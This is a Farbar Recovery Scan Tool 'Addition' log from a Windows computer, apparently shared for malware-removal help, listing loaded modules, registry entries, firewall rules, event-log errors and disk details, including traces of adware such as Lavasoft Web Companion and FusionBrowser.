2015-12-11 12:38 - 2015-12-08 16:36 - 00021840 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\_cffi_unicode_environ_win32_x8bf8e68bx9968e850.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00038696 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\fastpath.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00024528 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32event.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00020936 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\mmapfile.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00114640 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32security.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00021320 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\_cffi_pywin_kernel32_xde9e4433x360333f0.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00124880 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32file.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00030160 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32pipe.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00043472 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32process.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00175560 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32gui.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00028616 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32ts.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00024016 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32clipboard.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00048592 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32service.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00024392 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\librsyncffi.compiled._librsyncffi.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00036296 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\librsync.dll
2015-12-11 12:38 - 2015-10-30 20:00 - 00024016 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32profile.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00117056 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\breakpad.client.windows.handler.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00023376 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\winscreenshot.compiled._CaptureScreenshot.pyd
2015-12-11 12:38 - 2015-10-30 19:59 - 00134608 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\_elementtree.pyd
2015-12-11 12:38 - 2015-10-30 19:59 - 00134088 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\pyexpat.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00240584 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\jpegtran.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00020280 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\cpuid.compiled._cpuid.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00052024 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\psutil._psutil_windows.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00021304 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Crypto.Util.strxor.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00350152 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\winxpgui.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00084792 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\dropbox_sqlite_ext.DLL
2015-12-11 12:38 - 2015-12-08 16:36 - 01826608 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtCore.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00083912 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\sip.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 03891504 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtWidgets.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 01950000 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtGui.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00519984 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtNetwork.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00133936 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtWebKit.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00225080 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtWebKitWidgets.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00207672 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtPrintSupport.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00024904 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\_cffi_wpad_proxy_win_x752e3d61xdcfdcc84.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00486704 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtQuick.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00357680 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\PyQt5.QtQml.pyd
2015-03-04 16:45 - 2015-10-30 20:01 - 00019920 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\QtQuick.2\qtquick2plugin.dll
2015-03-04 16:45 - 2015-10-30 20:00 - 00786904 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\QtQuick\Controls\qtquickcontrolsplugin.dll
2015-07-30 06:30 - 2015-10-30 20:00 - 00063448 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\QtQuick\Layouts\qquicklayoutsplugin.dll
2015-03-04 16:45 - 2015-10-30 20:00 - 00019408 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\QtQuick\Window.2\windowplugin.dll
2015-12-11 12:38 - 2015-10-30 20:00 - 00060880 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32print.pyd
2014-11-17 12:13 - 2014-11-17 12:13 - 00316576 _____ () C:\Program Files\Microsoft Office 15\root\office15\AppVIsvStream32.dll
2011-03-01 22:14 - 2011-03-01 22:14 - 02143576 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtCore4.dll
2011-03-01 22:14 - 2011-03-01 22:14 - 07954776 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtGui4.dll
2011-03-01 22:15 - 2011-03-01 22:15 - 00340824 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtXml4.dll
2011-03-01 22:15 - 2011-03-01 22:15 - 00027480 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QGif4.dll
2011-03-01 22:15 - 2011-03-01 22:15 - 00126808 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QJpeg4.dll
2013-08-22 19:43 - 2013-08-22 19:43 - 00272688 _____ () C:\Program Files (x86)\SMART Technologies\Education Software\sbsdk-server\node_modules\SBSDK.node
2013-08-22 19:44 - 2013-08-22 19:44 - 00039216 _____ () C:\Program Files (x86)\SMART Technologies\Education Software\sbsdk-server\node_modules\HWR.node
2013-08-22 19:44 - 2013-08-22 19:44 - 00053040 _____ () C:\Program Files (x86)\SMART Technologies\Education Software\sbsdk-server\node_modules\SWR.node
2013-08-22 19:44 - 2013-08-22 19:44 - 00057648 _____ () C:\Program Files (x86)\SMART Technologies\Education Software\sbsdk-server\node_modules\MWR.node
2013-08-22 19:44 - 2013-08-22 19:44 - 00014848 _____ () C:\Program Files (x86)\SMART Technologies\Education Software\sbsdk-server\node_modules\SessionNotification.node
2014-08-05 19:57 - 2013-12-10 10:27 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00113424 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.Utils.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00044304 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.Common.Platform.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00010000 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.UpdateComponents.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00272656 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.Business.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00022288 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.AvastWrapper.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00046864 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.adblocker.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00012560 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.Utils.SqlLite.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00120080 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.PUP.Management.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00036112 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.CSharp.Utilities.dll
2016-01-10 11:55 - 2016-01-10 11:55 - 00121912 _____ () C:\Program Files (x86)\Get-a-Clip\Get-a-Clip.Config.dll
2016-01-10 11:56 - 2015-11-30 14:51 - 00201216 _____ () C:\Program Files\FusionBrowser\1.265.1\isa.dll
2016-01-10 11:56 - 2015-12-02 14:46 - 00858112 _____ () C:\Program Files\FusionBrowser\1.265.1\bl.dll
2016-01-10 11:56 - 2015-10-14 08:41 - 01481728 _____ () C:\Program Files\FusionBrowser\1.265.1\libglesv2.dll
2016-01-10 11:56 - 2015-10-14 08:41 - 00073728 _____ () C:\Program Files\FusionBrowser\1.265.1\libegl.dll
2016-01-10 11:56 - 2015-11-27 11:44 - 09596928 _____ () C:\Program Files\FusionBrowser\1.265.1\pdf.dll
2015-10-30 15:03 - 2015-09-01 07:25 - 08901184 _____ () C:\Program Files\Microsoft Office 15\root\Office15\1033\GrooveIntlResource.dll
2015-12-16 18:24 - 2015-12-10 22:54 - 01583432 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.106\libglesv2.dll
2015-12-16 18:24 - 2015-12-10 22:54 - 00081224 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.106\libegl.dll
2016-01-10 11:55 - 2016-01-10 11:55 - 00111600 _____ () C:\Windows\SysWOW64\mfllib.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"
==================== EXE Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\webcompanion.com -> hxxp://webcompanion.com
==================== Hosts content: ===============================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 209.18.47.61 - 209.18.47.62
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(Currently there is no automatic fix for this section.)
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{E75569AE-50A8-44C1-A32F-AD23188C2CB6}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{7680980E-AFE8-4400-86BE-E8CB45B91F9C}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{6901D64F-8A7C-49ED-B599-379F31A1D079}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{86B23BAD-5055-406F-BB36-738D9FB3699C}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [VirtualPC-In-UDP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-UDP-2] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-TCP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [{DC77C6D1-D024-493B-8B75-410DF81A6358}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12.exe
FirewallRules: [{7168F623-787A-4CDE-A5A4-438705AD2602}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMR\PowerDVD12DMREngine.exe
FirewallRules: [{E6CA9AA2-23FF-41A8-AA49-38016672B113}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe
FirewallRules: [{63BAC35C-EE22-4B00-975D-F7795CFAD160}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12Agent.exe
FirewallRules: [{6C522205-C94A-4F4E-B895-3F416E04B44C}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12ML.exe
FirewallRules: [{471F6A8E-1FF9-49EF-847B-5C6B3CB3D12B}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD.exe
FirewallRules: [{0B1727FC-2FFC-4A3D-9AE4-6A32CB3F2753}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{A7B24D37-F84C-4EEF-A81E-6E88143D37BB}] => (Allow) C:\Users\Charlie\AppData\Local\Temp\7zS65A9\hppiw.exe
FirewallRules: [{4FE76D1B-5775-4778-8125-56AA8D00B059}] => (Allow) C:\Users\Charlie\AppData\Local\Temp\7zS65A9\hppiw.exe
FirewallRules: [{A882E021-2855-4880-849D-8CA9690D3D71}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\bin\FaxApplications.exe
FirewallRules: [{AA3EA242-0AEB-4293-8779-68CA68858092}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\bin\DigitalWizards.exe
FirewallRules: [{8971BE9B-6954-45D6-9570-61022EC543CE}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\bin\SendAFax.exe
FirewallRules: [{45185B2D-FFEA-4CA7-BFEB-4B1F5DEA3392}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\Bin\DeviceSetup.exe
FirewallRules: [{7BE75A0B-473B-47E2-8495-A466A38D1DB3}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\Bin\HPNetworkCommunicator.exe
FirewallRules: [{8771921B-36F7-41CC-9BC1-1C3F09441BE4}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [{AB51C4E2-4697-419D-94C9-D05F75F35E90}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe
FirewallRules: [{99E785A4-EE33-4BA9-B2EC-B9AE4AA232A7}] => (Allow) C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{639DBDAE-AF66-45D9-8C19-28DD2B4CD3F1}] => (Allow) C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [TCP Query User{924914E8-9B73-4F52-A8EB-1974847A3A64}C:\users\charlie\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\charlie\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{C3C42EF4-E849-4E17-84FD-7C51B888F724}C:\users\charlie\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\charlie\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{4C865574-1791-467D-A39E-777F35B9BB5A}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [{9FBBACC0-771E-4247-82B3-97C554071FE3}] => (Allow) C:\Program Files (x86)\SMART Technologies\Education Software\UCGui.exe
FirewallRules: [{D9E6B306-441A-4561-88EA-2B45E29BDF17}] => (Allow) C:\Program Files (x86)\SMART Technologies\Education Software\UCGui.exe
FirewallRules: [{0D410DCC-E755-45B5-A0BA-15CF135860A1}] => (Allow) C:\Program Files (x86)\SMART Technologies\Education Software\UCService.exe
FirewallRules: [{B9D13898-08A4-4BE6-9030-81B80A9D1C96}] => (Allow) C:\Program Files (x86)\SMART Technologies\Education Software\UCService.exe
FirewallRules: [{9F760AEE-E28D-4246-85F6-D798DBD37D95}] => (Allow) C:\Program Files (x86)\SMART Technologies\Education Software\SMARTSNMPAgent.exe
FirewallRules: [{728DB316-43BE-4AC1-AE04-6E2D67FC6DD5}] => (Allow) C:\Program Files (x86)\SMART Technologies\Education Software\SMARTSNMPAgent.exe
FirewallRules: [{415E4BA5-28B9-4705-A0D2-FCC36C68F5B3}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{DFE46748-6EAE-40FB-A7EE-80588A78F708}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{DABE3CAF-D079-48DB-88B5-E315F1930A59}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{A66A3673-3901-4F0E-A931-CF762C470A52}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{83FECCAA-FC3E-4F60-9206-F5C7E977D0BA}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
FirewallRules: [{46D0D44E-BBA0-43E7-9B59-91A072459763}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
==================== Restore Points =========================
25-12-2015 10:47:29 Scheduled Checkpoint
01-01-2016 11:46:28 Scheduled Checkpoint
01-01-2016 14:54:52 McAfee Vulnerability Scanner
09-01-2016 01:54:13 Scheduled Checkpoint
==================== Faulty Device Manager Devices =============
Name: SMART Virtual TabletPC
Description: SMART Virtual TabletPC
Class Guid: {745a17a0-74d3-11d0-b6fe-00a0c90f57da}
Manufacturer: SMART Technologies ULC
Service: SMARTVTabletPCx64
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
Name: Officejet Pro 8600
Description: Officejet Pro 8600
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
==================== Event log errors: =========================
Application errors:
==================
Error: (01/10/2016 10:11:08 AM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005
Error: (01/09/2016 10:57:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: msn.exe, version: 11.50.44.1200, time stamp: 0x55cbe32e
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x74d9cb49
Faulting process id: 0x2cc8
Faulting application start time: 0xmsn.exe0
Faulting application path: msn.exe1
Faulting module path: msn.exe2
Report Id: msn.exe3
Error: (01/09/2016 09:26:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: OPBHOBrokerDsktop.exe, version: 8.0.1.11, time stamp: 0x5335c3d5
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x000001bb2051ff41
Faulting process id: 0x11a8
Faulting application start time: 0xOPBHOBrokerDsktop.exe0
Faulting application path: OPBHOBrokerDsktop.exe1
Faulting module path: OPBHOBrokerDsktop.exe2
Report Id: OPBHOBrokerDsktop.exe3
Error: (01/09/2016 08:34:17 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 830580
Error: (01/09/2016 08:34:17 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 830580
Error: (01/09/2016 08:34:17 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (01/09/2016 08:20:27 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 998
Error: (01/09/2016 08:20:27 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 998
Error: (01/09/2016 08:20:27 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (01/09/2016 05:21:29 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 1188665
System errors:
=============
Error: (01/03/2016 05:58:32 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)
Error: (01/03/2016 05:57:50 PM) (Source: Microsoft-Windows-WHEA-Logger) (EventID: 18) (User: NT AUTHORITY)
Description: A fatal hardware error has occurred.
Reported by component: Processor Core
Error Source: 3
Error Type: 9
Processor ID: 0
The details view of this entry contains further information.
Error: (01/02/2016 01:46:10 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the HPWMISVC service.
Error: (01/02/2016 01:46:11 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)
Error: (01/02/2016 01:46:01 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Windows Search service failed to start due to the following error:
%%1053
Error: (01/02/2016 01:46:01 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Windows Search service to connect.
Error: (01/02/2016 01:46:01 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1053WSearch{9E175B6D-F52A-11D8-B9A5-505054503030}
Error: (01/02/2016 01:45:37 PM) (Source: Microsoft-Windows-WHEA-Logger) (EventID: 18) (User: NT AUTHORITY)
Description: A fatal hardware error has occurred.
Reported by component: Processor Core
Error Source: 3
Error Type: 9
Processor ID: 0
The details view of this entry contains further information.
Error: (01/02/2016 01:42:40 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {995C996E-D918-4A8C-A302-45719A6F4EA7}
Error: (01/02/2016 01:41:38 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {EC9100F8-5918-4F1B-9CC1-4D34A64E0FE0}
==================== Memory info ===========================
Processor: Intel® Core i7-4710HQ CPU @ 2.50GHz
Percentage of memory in use: 53%
Total physical RAM: 8126.3 MB
Available physical RAM: 3783.11 MB
Total Virtual: 16250.8 MB
Available Virtual: 11494.99 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:908.31 GB) (Free:819.22 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (Recovery) (Fixed) (Total:22.9 GB) (Free:2.46 GB) NTFS ==>[system with boot components (obtained from drive)]
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 31772172)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=908.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=22.9 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=102 MB) - (Type=0C)
==================== End of Addition.txt ============================